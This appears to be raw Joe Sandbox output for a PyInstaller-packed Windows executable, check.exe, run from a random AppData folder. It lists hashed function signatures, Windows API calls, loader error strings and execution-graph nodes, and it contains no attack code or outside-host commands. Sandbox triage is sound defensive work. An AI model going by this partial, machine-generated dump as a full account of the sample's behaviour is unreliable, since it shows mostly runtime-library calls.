                                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                                          • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                          • Instruction ID: 7508107a6a5dc49e32579bebfac56a9a621a103675e84c99e32a3954be5bc991
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82116D20B1CE4282FA58BF215AD117DE1429F447B0FA447B4D92E466D6FEACB409C324
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7124F1B6A), ref: 00007FF7124F295E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                          • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                          • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                          • Instruction ID: f6127dcb412cba6335e87c5195d0f68a6203cea994bd1cb8983ac490586f04fd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0631C722B18A8152E710BB65A8816E7A295BFC87F8F800131EE8D83755EFBCD55AC610
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                          • String ID: Unhandled exception in script
                                                                                                                                                                                                                                          • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                          • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                          • Instruction ID: b1cbeaba42348124522203c7b92dd1bdc309ccd5032514b0233f9594a50995f4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD318832A19E8185E724EF21E8951F9A360FF887A4F840135EE4D47B59DFBCD109C714
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7124F918F,?,00007FF7124F3C55), ref: 00007FF7124F2BA0
                                                                                                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF7124F2C2A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                          • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                          • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                          • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                          • Instruction ID: cba7b91b10c78df430e1eacb77bafa8c185751a48a2d9d25eeb7d5bc6aee0c6f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D21A162708F4182E710EF18F8857AAB3A4FB88794F804136EE8D57655EE7CD619C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7124F1B99), ref: 00007FF7124F2760
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                          • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                          • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                          • Instruction ID: 7a1640d3e03f624ac5e68d2ea6d5e2109b7fcc792f90faae1092cb064d976594
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0021AE32B18B8282E720EB54F8817E6A394FB883A4F800135EE8C43659EFBCD559C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                          • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                          • Instruction ID: c14dcc6795daae549167b9c5baa04d6161f72c93a423038632624815945f910e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73F04461B19F0681EB10AF25A8D53759330AF457B1F940279D56E451E4EFACD54CC320
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                                                                                          • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                          • Instruction ID: 6cd900eea8c9c0958a777e5466238cdc2cb603c066f16d74dbd2e8e991d731ec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD118222F6CE0301FA643965E4D237D9070BF59370FC806B4EA6E172D68EEC684EC121
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B3AF
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B3CE
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B3F6
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B407
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B418
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                                          • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                          • Instruction ID: dc7a55f717b2a8568f3d506291374d109cfee97a9748e077d973c59abc632cd1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67117220F08E0281F958BF265DD1579E1425F547B0FD843B4D97E466C6FDACB509C324
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                                          • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                          • Instruction ID: b9de143e5684571c2c84c89c29413c3598c912d1bb8ed7cbadc207ac3a93adb1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E111C20E09E0782F95C7E624CD257DA1424F59730F9447B4D93E4A6C2FDACB448D239
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: verbose
                                                                                                                                                                                                                                          • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                          • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                                          • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                          • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2718003287-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1956198572-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                                                                          • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF712509046
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A948: RtlFreeHeap.NTDLL(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A95E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A948: GetLastError.KERNEL32(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A968
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7124FCBA5), ref: 00007FF712509064
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                          • API String ID: 3580290477-2842465422
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                          • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                          • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                          • Instruction ID: 7060670d16fe25130a5e2a1a4a3e4501f15ac21f69330d5fc9e0fb424bb7b213
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74210662B08A8182EB20AF11D88427DB3A1FB84B94FD54175DA4D43284EFBCE949C764
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                          • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                          • Instruction ID: 186b8ff2501686ea82f3f289fc57e715a6d7b0ab567ceabfe49c2ef7f800a09b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3114C32618F8182EB619F15E440259B7E4FB88B94F994234DF8D07754EF7CC955C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                          • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                          • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                          • Instruction ID: 1fe3430162a72b061d5afa78aaf49a291a536279d56122a68d2cf6ca6372b998
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7001A721B1CA0385F720BF6094A527EA7A0EF48764FC00475D94D42681EFBCE50CCB28

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:5.9%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:604
                                                                                                                                                                                                                                          Total number of Limit Nodes:16
12371->12370 12373 7ff7124f8d3a 12372->12373 12373->12363 12376 7ff7124f8d40 TranslateMessage DispatchMessageW PeekMessageW 12373->12376 12377 7ff7124f8d7c QueryPerformanceCounter 12373->12377 12374->12355 12374->12356 12375->12374 12375->12375 12376->12373 12376->12376 12377->12366 12377->12372 12385 7ff71250546c EnterCriticalSection 12378->12385 12387 7ff7124f92bf FindClose 12386->12387 12388 7ff7124f92d2 12386->12388 12387->12388 12388->12273 12390 7ff7124fc850 12389->12390 12391 7ff7124f2c70 GetCurrentProcessId 12390->12391 12392 7ff7124f2cb9 12391->12392 12404 7ff712504bd8 12392->12404 12394 7ff7124f2d04 12395 7ff7124f2d45 FormatMessageW 12394->12395 12396 7ff7124f2d7f MessageBoxW 12395->12396 12397 7ff7124f2d6d 12395->12397 12398 7ff7124f2daf 12396->12398 12397->12396 12398->12275 12400 7ff7124f946a WideCharToMultiByte 12399->12400 12402 7ff7124f9495 12399->12402 12400->12402 12403 7ff7124f94ab 12400->12403 12401 7ff7124f94b2 WideCharToMultiByte 12401->12403 12402->12401 12402->12403 12403->12275 12406 7ff712504c32 12404->12406 12405 7ff712504d74 12407 7ff71250a948 __free_lconv_mon 2 API calls 12405->12407 12406->12405 12408 7ff712504c57 12406->12408 12409 7ff712504d9a 12406->12409 12410 7ff712504d49 12406->12410 12411 7ff712504d40 12406->12411 12407->12408 12408->12394 12409->12405 12412 7ff712504da4 12409->12412 12413 7ff71250a948 __free_lconv_mon 2 API calls 12410->12413 12411->12405 12411->12410 12414 7ff71250a948 __free_lconv_mon 2 API calls 12412->12414 12413->12408 12414->12408 12416 7ff7124f6375 12415->12416 12417 7ff7124f1c80 2 API calls 12416->12417 12418 7ff7124f63b1 12417->12418 12423 7ff7124f63ba 12418->12423 12433 7ff7124f4560 12418->12433 12420 7ff7124f641d 12421 7ff7124f8e80 3 API calls 12420->12421 12422 7ff7124f642b 12420->12422 12421->12422 12422->12423 12437 7ff7124f8e80 12422->12437 12423->12297 12425 7ff7124f6476 12425->12423 12426 7ff7124f9390 2 API calls 12425->12426 12427 7ff7124f649a GetLastError 12426->12427 12428 7ff7124f2c50 5 API 
calls 12427->12428 12428->12423 12432 7ff7124f6070 12429->12432 12430 7ff7124f6099 12430->12299 12431 7ff7124f1470 42 API calls 12431->12432 12432->12430 12432->12431 12434 7ff7124f456a 12433->12434 12435 7ff7124f9390 2 API calls 12434->12435 12436 7ff7124f458f 12435->12436 12436->12420 12438 7ff7124f9390 2 API calls 12437->12438 12439 7ff7124f8e94 LoadLibraryExW 12438->12439 12440 7ff7124f8eb3 12439->12440 12440->12425 12442 7ff7125078f8 12441->12442 12445 7ff7125073d4 12442->12445 12444 7ff712507911 12444->12309 12446 7ff71250741e 12445->12446 12448 7ff7125073ef 12445->12448 12453 7ff71250546c EnterCriticalSection 12446->12453 12448->12444 12449 7ff712507423 12450 7ff712507440 _invalid_parameter_noinfo 12449->12450 12451 7ff71250742f 12450->12451 12452 7ff712505478 _fread_nolock LeaveCriticalSection 12451->12452 12452->12448 12455 7ff7124f41a1 12454->12455 12456 7ff7124f44e0 2 API calls 12455->12456 12457 7ff7124f41db 12456->12457 12458 7ff7124f44e0 2 API calls 12457->12458 12459 7ff7124f41eb 12458->12459 12460 7ff7124f4267 12459->12460 12462 7ff7124f429c 12459->12462 12468 7ff7124f7cf0 12460->12468 12463 7ff7124f1950 42 API calls 12462->12463 12464 7ff7124f4277 12462->12464 12463->12464 12464->12332 12466 7ff7124f1c80 2 API calls 12465->12466 12467 7ff7124f4474 12466->12467 12467->12332 12469 7ff7124f7d05 12468->12469 12470 7ff7124f45c0 33 API calls 12469->12470 12471 7ff7124f7d2b 12470->12471 12472 7ff7124f45c0 33 API calls 12471->12472 12475 7ff7124f7d52 12471->12475 12473 7ff7124f7d42 12472->12473 12474 7ff7124f7d4d 12473->12474 12484 7ff7124f7d5c 12473->12484 12476 7ff71250004c 9 API calls 12474->12476 12475->12464 12476->12475 12477 7ff7124f7dbf 12478 7ff71250004c 9 API calls 12477->12478 12479 7ff7124f7de7 12478->12479 12481 7ff71250004c 9 API calls 12479->12481 12480 7ff71250039c _fread_nolock 23 API calls 12480->12484 12481->12475 12482 7ff7124f7dc1 12482->12477 12485 7ff712507318 12482->12485 12484->12477 12484->12480 12484->12482 12486 7ff712507320 
12485->12486 12487 7ff71250735d 12486->12487 12488 7ff71250733c 12486->12488 12502 7ff71250546c EnterCriticalSection 12487->12502 12490 7ff712507341 _invalid_parameter_noinfo 12488->12490 12492 7ff71250734d 12490->12492 12492->12477 12504 7ff71250a49a 12503->12504 12505 7ff71250a485 12503->12505 12504->12341 12506 7ff71250a48a _invalid_parameter_noinfo 12505->12506 12506->12504 12512 7ff71250b150 GetLastError 12507->12512 12513 7ff71250b191 FlsSetValue 12512->12513 12514 7ff71250b174 FlsGetValue 12512->12514 12516 7ff71250b181 12513->12516 12517 7ff71250b1a3 12513->12517 12515 7ff71250b18b 12514->12515 12514->12516 12515->12513 12518 7ff71250b1fd SetLastError 12516->12518 12519 7ff71250eb98 _fread_nolock HeapAlloc 12517->12519 12520 7ff71250a3e1 12518->12520 12521 7ff71250b21d 12518->12521 12522 7ff71250b1b2 12519->12522 12532 7ff71250a504 12520->12532 12525 7ff71250a504 IsProcessorFeaturePresent 12521->12525 12523 7ff71250b1d0 FlsSetValue 12522->12523 12524 7ff71250b1c0 FlsSetValue 12522->12524 12527 7ff71250b1dc FlsSetValue 12523->12527 12528 7ff71250b1ee 12523->12528 12526 7ff71250b1c9 12524->12526 12529 7ff71250b222 12525->12529 12530 7ff71250a948 __free_lconv_mon 2 API calls 12526->12530 12527->12526 12531 7ff71250a948 __free_lconv_mon 2 API calls 12528->12531 12530->12516 12531->12518 12533 7ff71250a50d 12532->12533 12534 7ff71250a525 IsProcessorFeaturePresent 12533->12534 12535 7ff71250a534 12533->12535 12534->12535 12536 7ff712505628 12537 7ff71250565f 12536->12537 12541 7ff712505642 12536->12541 12538 7ff712505672 CreateFileW 12537->12538 12537->12541 12539 7ff7125056a6 12538->12539 12540 7ff7125056dc 12538->12540 12544 7ff7125056d1 CloseHandle 12539->12544 12545 7ff7125056bb CloseHandle 12539->12545 12548 7ff712505c04 12540->12548 12543 7ff71250564f _invalid_parameter_noinfo 12541->12543 12546 7ff7125056fd 12543->12546 12544->12546 12545->12546 12547 7ff7125056e1 12547->12546 12550 7ff712505c3a 12548->12550 12549 7ff712505cd2 12549->12547 12550->12549 
12551 7ff712505cc4 GetDriveTypeW 12550->12551 12551->12549

Control-flow Graph
[Control-flow graph starting at 7ff7124f1000; legend: Executed, Not Executed]
Strings
Memory Dump Source
• Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
• Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
Similarity
• API ID: ErrorFileLastModuleName
